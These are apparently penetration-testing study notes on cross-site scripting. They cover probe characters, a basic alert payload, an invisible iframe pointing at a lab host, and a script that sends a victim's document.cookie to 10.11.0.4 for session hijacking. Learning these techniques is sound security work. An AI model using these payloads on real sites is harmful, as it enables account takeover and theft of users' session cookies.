Cross-Site Scripting
- If the data displayed on the website is not sanitized (server-side) we can abuse it to execute code under the context of the user viewing the page with their browser
- Sometimes output can appear not to be sanitized, but it's just encoded
- To verify, use the browser's debugger/inspector
Identifying XSS Vulnerabilities
- Search for input fields which display unsanitized output
- Test with these characters:
< > ' " { } ;
- Test with these characters:
Basic XSS
<script>alert('XSS')</script>
Content Injection
<iframe src=http://10.11.0.4/report height=”0” width=”0”></iframe>- IFrames are used to embed another file, in our case the report page hosted by us
- The IFrame is invisible since it doesn't have any height or width
- To test if it works:
sudo nc -nvlp 80- Try normal user behavior and see if we see the request in netcat
Stealing Cookies and Session Information
- If we can steal a authenticated user's cookie we can use it to impersonate them.
<script>new Image().src="http://10.11.0.4/cool.jpg?output="+document.cookie;</script>- Once the cookie has been retrieved, use the
Cookie-Editoraddon in Firefox to add/manipulate your own cookies
Relevant Note(s):